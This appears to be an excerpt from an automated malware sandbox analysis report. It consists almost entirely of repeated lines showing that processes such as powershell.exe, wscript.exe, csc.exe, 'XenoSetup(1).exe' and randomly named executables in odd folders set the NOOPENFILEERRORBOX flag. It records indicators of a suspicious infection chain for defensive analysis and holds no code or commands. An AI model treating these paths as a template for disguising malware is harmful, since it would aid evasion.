                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
